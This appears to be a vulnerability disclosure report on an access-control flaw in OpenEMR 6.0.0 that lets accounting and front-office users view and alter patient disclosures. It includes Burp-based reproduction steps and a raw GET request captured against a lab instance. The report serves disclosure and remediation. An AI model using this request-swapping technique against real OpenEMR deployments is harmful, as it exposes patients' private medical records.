Non-Privilege User Can View Patient’s Disclosures in openemr/openemr
Mar 28th 2022
Insecure Direct Object Reference
Non-privilege users (accounting, front office) can view patient’s disclosures and have the capability to add, edit and delete the patient’s disclosures. This function is not visible to non-privilege users upon viewing patient’s dashboard but a non-privilege users can directly send a GET request to the vulnerable endpoint and view it.
The OpenEMR cookie must be checked against the document parameters sent in the GET request to https://localhost/openemr-6.0.0/interface/patient_file/summary/record_disclosure.php to ensure that only cookies belonging to Admin or privileged users are allowed to view and use the features in forms administration.
Aden Yap Chuen Zhen (email@example.com)
Rizan, Sheikh (firstname.lastname@example.org)
Ali Radzali (email@example.com)
Login to EMR using admin and we can see there is Disclosures in the patient’s dashboard. Click on “Edit”.
Now, using a non-admin account, Eg Accountant user should not be able to view the patient’s disclosures.
Using Burp, we intercept the Admin request to edit the patient’s disclosures and swap the “OpenEMR” cookie using an Accountant cookie and we are be able to view the patient’s disclosures.
The Raw Request looks like:
GET /openemr/interface/patient_file/summary/record_disclosure.php?editlid=3 HTTP/1.1 Host: 192.168.153.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.153.129/openemr/interface/main/tabs/main.php?token_main=KnYCfBmjS9pZH0KnzZ5exFXbcAxxhKUP2JZwnEFD Cookie: OpenEMR=wXLcHx6rd0afp3JGFiB%2Cps94aa3icGyGvUi0DunXZ2YcFwuo Upgrade-Insecure-Requests: 1
The non-privilege users also have the capabilities to edit, add or delete any patient’s disclosures.